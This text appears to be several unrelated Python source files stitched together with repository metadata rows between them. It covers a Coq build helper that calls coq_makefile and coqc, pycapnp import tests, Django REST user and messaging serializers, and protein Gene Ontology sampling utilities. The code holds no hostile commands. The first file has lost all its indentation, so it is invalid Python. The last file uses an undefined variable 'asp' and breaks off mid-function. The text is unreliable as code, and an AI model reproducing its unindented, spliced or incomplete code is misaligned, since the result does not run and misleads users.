kwargs['log'](' '.join(cmds))
try:
p_make_makefile = subprocess.Popen(cmds,
stdout=subprocess.PIPE)
(stdout, stderr) = p_make_makefile.communicate()
except OSError as e:
error("When attempting to run coq_makefile:")
error(repr(e))
error("Failed to run coq_makefile using command line:")
error(' '.join(cmds))
error("Perhaps you forgot to add COQBIN to your PATH?")
error("Try running coqc on your files to get .glob files, to work around this.")
sys.exit(1)
if kwargs['verbose']:
kwargs['log'](' '.join(['make', '-k', '-f', mkfile] + targets))
try:
p_make = subprocess.Popen(['make', '-k', '-f', mkfile] + targets, stdin=subprocess.PIPE, stdout=sys.stderr) #, stdout=subprocess.PIPE)
return p_make.communicate()
finally:
for filename in (mkfile, mkfile + '.conf', mkfile + '.d', '.%s.d' % mkfile, '.coqdeps.d'):
if os.path.exists(filename):
os.remove(filename)
def make_one_glob_file(v_file, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
coqc_prog = get_maybe_passing_arg(kwargs, 'coqc')
cmds = [coqc_prog, '-q']
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
cmds += list(get_maybe_passing_arg(kwargs, 'coqc_args'))
v_file_root, ext = os.path.splitext(fix_path(v_file))
o_file = os.path.join(tempfile.gettempdir(), os.path.basename(v_file_root) + '.vo')
if get_coq_accepts_o(coqc_prog, **kwargs):
cmds += ['-o', o_file]
else:
kwargs['log']("WARNING: Clobbering '%s' because coqc does not support -o" % o_file)
cmds += ['-dump-glob', v_file_root + '.glob', v_file_root + ext]
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p = subprocess.Popen(cmds, stdout=subprocess.PIPE)
return p.communicate()
finally:
if os.path.exists(o_file): os.remove(o_file)
def make_globs(logical_names, **kwargs):
kwargs = fill_kwargs(kwargs)
existing_logical_names = [i for i in logical_names
if os.path.isfile(filename_of_lib(i, ext='.v', **kwargs))]
if len(existing_logical_names) == 0: return
filenames_vo_v_glob = [(filename_of_lib(i, ext='.vo', **kwargs), filename_of_lib(i, ext='.v', **kwargs), filename_of_lib(i, ext='.glob', **kwargs)) for i in existing_logical_names]
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.isfile(glob_name) and os.path.getmtime(glob_name) > os.path.getmtime(v_name))]
for vo_name, v_name, glob_name in filenames_vo_v_glob:
if os.path.isfile(glob_name) and not os.path.getmtime(glob_name) > os.path.getmtime(v_name):
os.remove(glob_name)
# if the .vo file already exists and is new enough, we assume
# that all dependent .vo files also exist, and just run coqc
# in a way that doesn't update the .vo file. We use >= rather
# than > because we're using .vo being new enough as a proxy
# for the dependent .vo files existing, so we don't care as
# much about being perfectly accurate on .vo file timing
# (unlike .glob file timing, were we need it to be up to
# date), and it's better to not clobber the .vo file when
# we're unsure if it's new enough.
if os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name):
make_one_glob_file(v_name, **kwargs)
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name))]
filenames_v = [v_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
filenames_glob = [glob_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
if len(filenames_vo_v_glob) == 0: return
extra_filenames_v = (get_all_v_files('.', filenames_v) if kwargs['walk_tree'] else [])
(stdout_make, stderr_make) = run_coq_makefile_and_make(tuple(sorted(list(filenames_v) + list(extra_filenames_v))), filenames_glob, **kwargs)
def get_glob_file_for(filename, update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if update_globs:
if file_mtimes[filename] > time.time():
kwargs['log']("WARNING: The file %s comes from the future! (%d > %d)" % (filename, file_mtimes[filename], time.time()))
if time.time() - file_mtimes[filename] < 2:
if kwargs['verbose']:
kwargs['log']("NOTE: The file %s is very new (%d, %d seconds old), delaying until it's a bit older" % (filename, file_mtimes[filename], time.time() - file_mtimes[filename]))
# delay until the .v file is old enough that a .glob file will be considered newer
# if we just wait until they're not equal, we apparently get issues like https://gitlab.com/Zimmi48/coq/-/jobs/535005442
while time.time() - file_mtimes[filename] < 2:
time.sleep(0.1)
make_globs([libname], **kwargs)
if os.path.isfile(globname):
if os.stat(globname).st_mtime > file_mtimes[filename]:
return get_raw_file(globname, **kwargs)
elif kwargs['verbose']:
kwargs['log']("WARNING: Assuming that %s is not a valid reflection of %s because %s is newer (%d >= %d)" % (globname, filename, filename, file_mtimes[filename], os.stat(globname).st_mtime))
return None
def get_byte_references_for(filename, types, **kwargs):
globs = get_glob_file_for(filename, **kwargs)
if globs is None: return None
references = get_references_from_globs(globs)
return tuple((start, end, loc, append, ty) for start, end, loc, append, ty in references
if types is None or ty in types)
def get_file_as_bytes(filename, absolutize=('lib',), update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if len(absolutize) > 0:
globs = get_glob_file_for(filename, update_globs=update_globs, **kwargs)
if globs is not None:
file_contents[filename] = update_with_glob(file_contents[filename], globs, absolutize, libname, **kwargs)
return file_contents[filename]
# returns string, newlines normalized
def get_file(*args, **kwargs):
return util.normalize_newlines(get_file_as_bytes(*args, **kwargs).decode('utf-8'))
def get_require_dict(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if lib not in lib_imports_slow.keys():
make_globs([lib], **kwargs)
if os.path.isfile(glob_name): # making succeeded
contents = get_raw_file(glob_name, **kwargs)
lines = contents.split('\n')
lib_imports_slow[lib] = {}
for start, end, name in IMPORT_REG.findall(contents):
name = norm_libname(name, **kwargs)
if name not in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = []
lib_imports_slow[lib][name].append((int(start), int(end)))
for name in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = tuple(lib_imports_slow[lib][name])
if lib in lib_imports_slow.keys():
return lib_imports_slow[lib]
return {}
def get_require_names(lib, **kwargs):
return tuple(sorted(get_require_dict(lib, **kwargs).keys()))
def get_require_locations(lib, **kwargs):
return sorted(set(loc for name, locs in get_require_dict(lib, **kwargs).items()
for loc in locs))
def transitively_close(d, make_new_value=(lambda x: tuple()), reflexive=True):
updated = True
while updated:
updated = False
for key in tuple(d.keys()):
newv = set(d[key])
if reflexive: newv.add(key)
for v in tuple(newv):
if v not in d.keys(): d[v] = make_new_value(v)
newv.update(set(d[v]))
if newv != set(d[key]):
d[key] = newv
updated = True
return d
def get_recursive_requires(*libnames, **kwargs):
requires = dict((lib, get_require_names(lib, **kwargs)) for lib in libnames)
transitively_close(requires, make_new_value=(lambda lib: get_require_names(lib, **kwargs)), reflexive=True)
return requires
def get_recursive_require_names(libname, **kwargs):
return tuple(i for i in get_recursive_requires(libname, **kwargs).keys() if i != libname)
def sort_files_by_dependency(filenames, reverse=True, **kwargs):
kwargs = fill_kwargs(kwargs)
filenames = map(fix_path, filenames)
filenames = [(filename + '.v' if filename[-2:] != '.v' else filename) for filename in filenames]
libnames = [lib_of_filename(filename, **kwargs) for filename in filenames]
requires = get_recursive_requires(*libnames, **kwargs)
def fcmp(f1, f2):
if f1 == f2: return cmp(f1, f2)
l1, l2 = lib_of_filename(f1, **kwargs), lib_of_filename(f2, **kwargs)
if l1 == l2: return cmp(f1, f2)
# this only works correctly if the closure is *reflexive* as
# well as transitive, because we require that if A requires B,
# then A must have strictly more requires than B (i.e., it
# must include itself)
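        # Worked example (illustrative): if l1 requires l2, the reflexive
        # closure makes requires[l1] a strict superset of requires[l2] (it also
        # contains l2 itself), so len(requires[l1]) > len(requires[l2]).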
if len(requires[l1]) != len(requires[l2]): return cmp(len(requires[l1]), len(requires[l2]))
return cmp(l1, l2)
filenames = sorted(filenames, key=cmp_to_key(fcmp), reverse=reverse)
return filenames
def get_imports(lib, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if not fast:
get_require_dict(lib, **kwargs)
if lib in lib_imports_slow.keys():
return tuple(k for k, v in sorted(lib_imports_slow[lib].items(), key=(lambda kv: kv[1])))
# making globs failed, or we want the fast way, fall back to regexp
if lib not in lib_imports_fast.keys():
contents = get_file(v_name, **kwargs)
imports_string = re.sub('\\s+', ' ', ' '.join(IMPORT_LINE_REG.findall(contents))).strip()
lib_imports_fast[lib] = tuple(sorted(set(norm_libname(i, **kwargs)
for i in imports_string.split(' ') if i != '')))
return lib_imports_fast[lib]
def norm_libname(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = filename_of_lib(lib, **kwargs)
if os.path.isfile(filename):
return lib_of_filename(filename, **kwargs)
else:
return lib
def merge_imports(imports, **kwargs):
kwargs = fill_kwargs(kwargs)
rtn = []
for import_list in imports:
for i in import_list:
if norm_libname(i, **kwargs) not in rtn:
rtn.append(norm_libname(i, **kwargs))
return rtn
# This is a bottleneck for more than around 10,000 lines of code total with many imports (around 100)
@memoize
def internal_recursively_get_imports(lib, **kwargs):
return run_recursively_get_imports(lib, recur=internal_recursively_get_imports, **kwargs)
def recursively_get_imports(lib, **kwargs):
return internal_recursively_get_imports(lib, **safe_kwargs(kwargs))
def run_recursively_get_imports(lib, recur=recursively_get_imports, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if os.path.isfile(v_name):
imports = get_imports(lib, fast=fast, **kwargs)
if kwargs['inline_coqlib'] and 'Coq.Init.Prelude' not in imports:
mykwargs = dict(kwargs)
coqlib_libname = (os.path.join(kwargs['inline_coqlib'], 'theories'), 'Coq')
if coqlib_libname not in mykwargs['libnames']:
mykwargs['libnames'] = tuple(list(kwargs['libnames']) + [coqlib_libname])
try:
coqlib_imports = get_imports('Coq.Init.Prelude', fast=fast, **mykwargs)
if imports and not any(i in imports for i in coqlib_imports):
imports = tuple(list(coqlib_imports) + list(imports))
except IOError as e:
kwargs['log']("WARNING: --inline-coqlib passed, but no Coq.Init.Prelude found on disk.\n Searched in %s\n (Error was: %s)\n\n" % (repr(mykwargs['libnames']), repr(e)))
if not fast: make_globs(imports, **kwargs)
imports_list = [recur(k, fast=fast, **kwargs) for k in imports]
return merge_imports(tuple(map(tuple, imports_list + [[lib]])), **kwargs)
return [lib]
| mit | 1,641,937,864,110,081,000 | 49.052632 | 404 | 0.625096 | false | 3.401693 | false | false | false |
jparyani/pycapnp | test/test_load.py | 1 | 2708 | import pytest
import capnp
import os
import sys
this_dir = os.path.dirname(__file__)
@pytest.fixture
def addressbook():
return capnp.load(os.path.join(this_dir, 'addressbook.capnp'))
@pytest.fixture
def foo():
return capnp.load(os.path.join(this_dir, 'foo.capnp'))
@pytest.fixture
def bar():
return capnp.load(os.path.join(this_dir, 'bar.capnp'))
def test_basic_load():
capnp.load(os.path.join(this_dir, 'addressbook.capnp'))
def test_constants(addressbook):
assert addressbook.qux == 123
def test_classes(addressbook):
assert addressbook.AddressBook
assert addressbook.Person
def test_import(foo, bar):
m = capnp._MallocMessageBuilder()
foo = m.init_root(foo.Foo)
m2 = capnp._MallocMessageBuilder()
bar = m2.init_root(bar.Bar)
foo.name = 'foo'
bar.foo = foo
assert bar.foo.name == 'foo'
def test_failed_import():
s = capnp.SchemaParser()
s2 = capnp.SchemaParser()
foo = s.load(os.path.join(this_dir, 'foo.capnp'))
bar = s2.load(os.path.join(this_dir, 'bar.capnp'))
m = capnp._MallocMessageBuilder()
foo = m.init_root(foo.Foo)
m2 = capnp._MallocMessageBuilder()
bar = m2.init_root(bar.Bar)
foo.name = 'foo'
with pytest.raises(Exception):
bar.foo = foo
def test_defualt_import_hook():
# Make sure any previous imports of addressbook_capnp are gone
capnp.cleanup_global_schema_parser()
import addressbook_capnp # noqa: F401
def test_dash_import():
import addressbook_with_dashes_capnp # noqa: F401
def test_spaces_import():
import addressbook_with_spaces_capnp # noqa: F401
def test_add_import_hook():
capnp.add_import_hook([this_dir])
# Make sure any previous imports of addressbook_capnp are gone
capnp.cleanup_global_schema_parser()
import addressbook_capnp
addressbook_capnp.AddressBook.new_message()
def test_multiple_add_import_hook():
capnp.add_import_hook()
capnp.add_import_hook()
capnp.add_import_hook([this_dir])
# Make sure any previous imports of addressbook_capnp are gone
capnp.cleanup_global_schema_parser()
import addressbook_capnp
addressbook_capnp.AddressBook.new_message()
def test_remove_import_hook():
capnp.add_import_hook([this_dir])
capnp.remove_import_hook()
if 'addressbook_capnp' in sys.modules:
# hack to deal with it being imported already
del sys.modules['addressbook_capnp']
with pytest.raises(ImportError):
import addressbook_capnp # noqa: F401
def test_bundled_import_hook():
# stream.capnp should be bundled, or provided by the system capnproto
capnp.add_import_hook()
import stream_capnp # noqa: F401
| bsd-2-clause | -2,962,946,150,982,487,000 | 21.756303 | 73 | 0.684638 | false | 3.167251 | true | false | false |
RUBi-ZA/JMS | src/users/serializers.py | 2 | 2766 | from rest_framework import serializers
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from users.models import *
class CountrySerializer(serializers.ModelSerializer):
class Meta:
model = Country
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','email','first_name','id','last_login','last_name','username')
class GroupUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('id','username')
class GroupSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
class Meta:
model = Group
fields = ('id', 'name', 'user_set')
class UserProfileSerializer(serializers.ModelSerializer):
user = UserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class UserProfileNameSerializer(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = UserProfile
fields = ('user',)
class ContactUserSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = ('date_joined','first_name','id','last_name','username')
class ContactProfileSerializer(serializers.ModelSerializer):
user = ContactUserSerializer()
Country = CountrySerializer()
class Meta:
model = UserProfile
class ContactSerializer(serializers.ModelSerializer):
ContactProfile = ContactProfileSerializer()
class Meta:
model = Contact
class MessageSerializer(serializers.ModelSerializer):
UserProfile = UserProfileNameSerializer()
class Meta:
model = Message
fields = ('MessageID', 'Content', 'Date', 'UserProfile')
class UserConversationSerializer(serializers.ModelSerializer):
UserProfile = UserProfileSerializer()
class Meta:
model = UserConversation
class FullConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
Messages = MessageSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations', 'Messages')
class ConversationSerializer(serializers.ModelSerializer):
UserConversations = UserConversationSerializer(many=True)
class Meta:
model = Conversation
fields = ('ConversationID', 'Subject', 'LastMessage', 'UserConversations')
class GroupConversationSerializer(serializers.ModelSerializer):
Conversation = FullConversationSerializer()
class Meta:
model = GroupConversation
fields = ('Conversation',)
class GroupDetailSerializer(serializers.ModelSerializer):
user_set = GroupUserSerializer(many=True)
groupconversation = GroupConversationSerializer()
class Meta:
model = Group
fields = ('id', 'name', 'user_set', 'groupconversation')
| gpl-2.0 | -2,556,878,542,363,221,000 | 26.386139 | 88 | 0.770065 | false | 3.884831 | false | false | false |
yotamfr/prot2vec | src/python/dingo_utils.py | 1 | 19157 | import torch
import os
import sys
import itertools
import threading
from concurrent.futures import ThreadPoolExecutor
from src.python.preprocess2 import *
from blast import *
from tempfile import gettempdir
tmp_dir = gettempdir()
out_dir = "./Data"
from scipy.stats import *
import pickle
NUM_CPU = 8
eps = 10e-6
E = ThreadPoolExecutor(NUM_CPU)
np.random.seed(101)
tmp_dir = gettempdir()
EVAL = 10e6
verbose = False
def save_object(obj, filename):
with open(filename, 'wb') as output:
try:
pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)
except RecursionError:
sys.setrecursionlimit(2 * sys.getrecursionlimit())
save_object(obj, filename)
def load_object(pth):
with open(pth, 'rb') as f:
loaded_dist_mat = pickle.load(f)
assert len(loaded_dist_mat) > 0
return loaded_dist_mat
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
def load_nature_repr_set(db):
def to_fasta(seq_map, out_file):
sequences = []
for unipid, seq in seq_map.items():
sequences.append(SeqRecord(BioSeq(seq), unipid))
SeqIO.write(sequences, open(out_file, 'w+'), "fasta")
repr_pth, all_pth = '%s/sp.nr.70' % out_dir, '%s/sp.fasta' % out_dir
fasta_fname = '%s/sp.nr.70' % out_dir
if not os.path.exists(repr_pth):
query = {"db": "sp"}
num_seq = db.uniprot.count(query)
src_seq = db.uniprot.find(query)
sp_seqs = UniprotCollectionLoader(src_seq, num_seq).load()
to_fasta(sp_seqs, all_pth)
os.system("cdhit/cd-hit -i %s -o %s -c 0.7 -n 5" % (all_pth, repr_pth))
num_seq = count_lines(fasta_fname, sep=bytes('>', 'utf8'))
fasta_src = parse_fasta(open(fasta_fname, 'r'), 'fasta')
seq_map = FastaFileLoader(fasta_src, num_seq).load()
all_seqs = [Seq(uid, str(seq)) for uid, seq in seq_map.items()]
return all_seqs
def get_distribution(dataset):
assert len(dataset) >= 3
return Distribution(dataset)
class Distribution(object):
def __init__(self, dataset):
self.pdf = gaussian_kde([d * 10 for d in dataset])
def __call__(self, *args, **kwargs):
assert len(args) == 1
# return self.pdf.integrate_box_1d(np.min(self.pdf.dataset), args[0])
return self.pdf(args[0])[0]
class Histogram(object):
def __init__(self, dataset):
self.bins = {(a, a + 1): .01 for a in range(10)}
for p in dataset:
a = min(int(p * 10), 9)
self.bins[(a, a + 1)] += 0.9 / len(dataset)
def __call__(self, *args, **kwargs):
        v = min(int(args[0] * 10), 9)  # clamp 1.0 into the last bin, mirroring __init__
        return self.bins[(v, v + 1)]
class NaiveBayes(object):
def __init__(self, dist_pos, dist_neg):
self.dist_pos = dist_pos
self.dist_neg = dist_neg
def infer(self, val, prior):
dist_pos = self.dist_pos
dist_neg = self.dist_neg
return np.log(prior) + np.log(dist_pos(val)) - np.log(dist_neg(val))
class ThreadSafeDict(dict):
    def __init__(self, *p_arg, **n_arg):
        dict.__init__(self, *p_arg, **n_arg)
        self._lock = threading.Lock()
    def __enter__(self):
        self._lock.acquire()
        return self
    def __exit__(self, type, value, traceback):
        self._lock.release()
class Seq(object):
def __init__(self, uid, seq, aa20=True):
if aa20:
self.seq = seq.replace('U', 'C').replace('O', 'K')\
.replace('X', np.random.choice(amino_acids))\
.replace('B', np.random.choice(['N', 'D']))\
.replace('Z', np.random.choice(['E', 'Q']))
else:
self.seq = seq
self.uid = uid
self.msa = None
self.f = dict()
def __hash__(self):
return hash(self.uid)
def __repr__(self):
return "Seq(%s, %s)" % (self.uid, self.seq)
def __eq__(self, other):
if isinstance(other, Seq):
return self.uid == other.uid
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __len__(self):
return len(self.seq)
class Node(object):
def __init__(self, go, sequences, fathers, children):
self.go = go
self.sequences = sequences
self.fathers = fathers
self.children = children
self._f_dist_out = None
self._f_dist_in = None
self._plus = None
self._ancestors = None
self._descendants = None
self.seq2vec = {}
self.dataset = [] # for K-S tests
def __iter__(self):
for seq in self.sequences:
yield seq
def __repr__(self):
return "Node(%s, %d)" % (self.go, self.size)
def __hash__(self):
return hash(self.go)
def __eq__(self, other):
if isinstance(other, Node):
return self.go == other.go
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def is_leaf(self):
return len(self.children) == 0
def is_root(self):
return len(self.fathers) == 0
@property
def cousins(self):
ret = set()
for father in self.fathers:
ret |= set(father.children)
return ret - {self}
@property
def ancestors(self):
if not self._ancestors:
self._ancestors = get_ancestors(self)
return self._ancestors
@property
def descendants(self):
if not self._descendants:
self._descendants = get_descendants(self)
return self._descendants
@property
def plus(self):
if not self._plus:
union = sequences_of(self.children)
assert len(union) <= self.size
self._plus = list(self.sequences - union)
return self._plus
@property
def size(self):
return len(self.sequences)
@property
def f_dist_out(self):
if self._f_dist_out:
return self._f_dist_out
else:
raise(KeyError("f_dist_out not computed for %s" % self))
@property
def f_dist_in(self):
if self._f_dist_in:
return self._f_dist_in
else:
raise(KeyError("f_dist_in not computed for %s" % self))
def sample(self, m):
n = min(self.size, m)
        sequences = list(self.sequences)  # np.random.choice needs a sequence, not a set
        s = set(np.random.choice(sequences, n, replace=False))
assert len(s) == n > 0
return s
def get_ancestors(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for father in curr.fathers:
if father in visited or father.is_root():
continue
visited.add(father)
Q.append(father)
return visited
def get_descendants(node):
Q = [node]
visited = {node}
while Q:
curr = Q.pop()
for child in curr.children:
if child in visited:
continue
visited.add(child)
Q.append(child)
return visited
def sequences_of(nodes):
return reduce(lambda s1, s2: s1 | s2,
map(lambda node: node.sequences, nodes), set())
def compute_node_prior(node, graph, grace=0.0):
node.prior = grace + (1 - grace) * node.size / len(graph.sequences)
class Graph(object):
def __init__(self, onto, uid2seq, go2ids, grace=0.5):
self._nodes = nodes = {}
self.sequences = sequences = set()
# self.onto = onto
nodes[onto.root] = self.root = Node(onto.root, set(), [], [])
for go, ids in go2ids.items():
seqs = set([Seq(uid, uid2seq[uid]) for uid in ids])
nodes[go] = Node(go, seqs, [], [])
sequences |= seqs
for go, obj in onto._graph._node.items():
if 'is_a' not in obj:
assert go == onto.root
continue
if go not in go2ids:
assert go not in nodes
continue
if go not in nodes:
assert go not in go2ids
continue
for father in obj['is_a']:
nodes[go].fathers.append(nodes[father])
nodes[father].children.append(nodes[go])
for node in nodes.values():
if node.is_leaf():
assert node.size > 0
continue
children = node.children
for child in children:
assert child.size > 0
node.sequences |= child.sequences
for node in nodes.values():
compute_node_prior(node, self, grace)
def prune(self, gte):
to_be_deleted = []
for go, node in self._nodes.items():
if node.size >= gte:
continue
for father in node.fathers:
father.children.remove(node)
for child in node.children:
child.fathers.remove(node)
to_be_deleted.append(node)
for node in to_be_deleted:
del self._nodes[node.go]
return to_be_deleted
def __len__(self):
return len(self._nodes)
def __iter__(self):
for node in self._nodes.values():
yield node
def __getitem__(self, go):
return self._nodes[go]
def __contains__(self, go):
return go in self._nodes
@property
def leaves(self):
return [node for node in self if node.is_leaf()]
@property
def nodes(self):
return list(self._nodes.values())
def sample(self, max_add_to_sample=10):
def sample_recursive(node, sampled):
if not node.is_leaf():
for child in node.children:
sampled |= sample_recursive(child, sampled)
plus = node.plus
s = min(max_add_to_sample, len(plus))
if s > 0:
sampled |= set(np.random.choice(plus, s, replace=False))
return sampled
return sample_recursive(self.root, set())
def sample_pairs(nodes, include_node, sample_size=10000):
pairs = set()
pbar = tqdm(range(len(nodes)), desc="nodes sampled")
for node in nodes:
pbar.update(1)
s_in = min(200, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
if include_node:
pairs |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
else:
pairs |= set((seq1, seq2) for seq1, seq2 in itertools.combinations(sample_in, 2))
pbar.close()
n = len(pairs)
pairs_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(pairs))[pairs_indices, :]
def sample_pairs_iou(graph, sample_size=10000):
data = set()
leaf_pairs = list(itertools.combinations(list(graph.leaves), 2))
n = len(leaf_pairs)
indices = np.random.choice(list(range(n)), sample_size, replace=False)
pbar = tqdm(range(len(indices)), desc="nodes sampled")
for leaf1, leaf2 in np.asarray(leaf_pairs)[indices, :]:
intersection = leaf1.ancestors & leaf2.ancestors
union = leaf1.ancestors | leaf2.ancestors
iou = len(intersection) / len(union)
iou = 2 * iou - 1 # scale to [-1, 1]
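        # Worked example (illustrative): leaves sharing 5 of the 10 ancestors
        # in their union give iou = 0.5, scaled to 0.0; identical ancestor sets
        # give 1.0 and disjoint ones give -1.0.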
sequences1 = list(leaf1.sequences - leaf2.sequences)
sequences2 = list(leaf2.sequences - leaf1.sequences)
s1 = min(len(sequences1), 100)
sample1 = np.random.choice(list(sequences1), s1, replace=False) if sequences1 else []
s2 = min(len(sequences2), 100)
sample2 = np.random.choice(list(sequences2), s2, replace=False) if sequences2 else []
data |= set((seq1, seq2, leaf1, 1) for seq1, seq2 in itertools.combinations(sample1, 2))
data |= set((seq1, seq2, leaf2, 1) for seq1, seq2 in itertools.combinations(sample2, 2))
data |= set((seq1, seq2, leaf1, iou) for seq1 in sample1 for seq2 in sample2)
data |= set((seq2, seq1, leaf2, iou) for seq2 in sample2 for seq1 in sample1)
pbar.update(1)
pbar.close()
n = len(data)
indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
return np.asarray(list(data))[indices, :]
def sample_pos_neg_no_common_ancestors(graph, sample_size=10000):
pos, neg = set(), set()
root_children = set(graph.root.children)
seq2nodes = {}
for node in graph:
for seq in node.sequences:
if seq in seq2nodes:
seq2nodes[seq].add(node)
else:
seq2nodes[seq] = {node}
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
list_in = list(node.sequences)
s_in = min(100, len(list_in))
sample_in = np.random.choice(list_in, s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
non_ancestors = root_children - node.ancestors
if not non_ancestors:
continue
distant = np.random.choice(list(non_ancestors))
for child in distant.descendants:
if not child.is_leaf():
continue
list_out = list(filter(lambda s: node not in seq2nodes[s], child.sequences))
if not list_out:
continue
s_out = min(100, len(list_out))
sample_out = np.random.choice(list_out, s_out, replace=False)
neg |= set((seq1, seq2, distant) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def sample_pos_neg(graph, sample_size=10000):
pos, neg = set(), set()
pbar = tqdm(range(len(graph)), desc="nodes sampled")
for node in graph:
pbar.update(1)
if not node.is_leaf():
continue
s_in = min(100, node.size)
sample_in = np.random.choice(list(node.sequences), s_in, replace=False)
pos |= set((seq1, seq2, node) for seq1, seq2 in itertools.combinations(sample_in, 2))
for cousin in node.cousins:
cousin_sequences = cousin.sequences - node.sequences
if not cousin_sequences:
continue
s_out = min(100, len(cousin_sequences))
sample_out = np.random.choice(list(cousin_sequences), s_out, replace=False)
neg |= set((seq1, seq2, cousin) for seq1 in sample_out for seq2 in sample_in)
pbar.close()
n, m = len(pos), len(neg)
pos_indices = np.random.choice(list(range(n)), min(n, sample_size), replace=False)
neg_indices = np.random.choice(list(range(m)), min(m, sample_size), replace=False)
return np.asarray(list(pos))[pos_indices, :], np.asarray(list(neg))[neg_indices, :]
def run_metric_on_triplets(metric, triplets, verbose=True):
data = []
n = len(triplets)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq1, seq2, node) in enumerate(triplets):
data.append(metric(seq1, seq2, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def run_metric_on_pairs(metric, pairs, verbose=True):
data = []
n = len(pairs)
if verbose:
pbar = tqdm(range(n), desc="triplets processed")
for i, (seq, node) in enumerate(pairs):
data.append(metric(seq, node))
if verbose:
pbar.update(1)
if verbose:
pbar.close()
return data
def l2_norm(seq, node):
vec = node.seq2vec[seq]
return np.linalg.norm(vec)
def cosine_similarity(seq1, seq2, node):
vec1 = node.seq2vec[seq1]
vec2 = node.seq2vec[seq2]
ret = fast_cosine_similarity(vec1, [vec2])
return ret[0]
def fast_cosine_similarity(vector, vectors, scale_zero_one=False):
vectors = np.asarray(vectors)
dotted = vectors.dot(vector)
matrix_norms = np.linalg.norm(vectors, axis=1)
vector_norm = np.linalg.norm(vector)
matrix_vector_norms = np.multiply(matrix_norms, vector_norm)
neighbors = np.divide(dotted, matrix_vector_norms).ravel()
if scale_zero_one:
return (neighbors + 1) / 2
else:
return neighbors
def kolmogorov_smirnov_cosine(pos, neg, metric):
data1 = run_metric_on_triplets(metric, pos)
data2 = run_metric_on_triplets(metric, neg)
save_object(data1, "Data/dingo_%s_ks_cosine_pos_data" % asp)
save_object(data2, "Data/dingo_%s_ks_cosine_neg_data" % asp)
return ks_2samp(data1, data2)
def kolmogorov_smirnov_norm(pos, neg, metric):
data1 = run_metric_on_pairs(metric, pos)
data2 = run_metric_on_pairs(metric, neg)
save_object(data1, "Data/dingo_%s_ks_norm_pos_data" % asp)
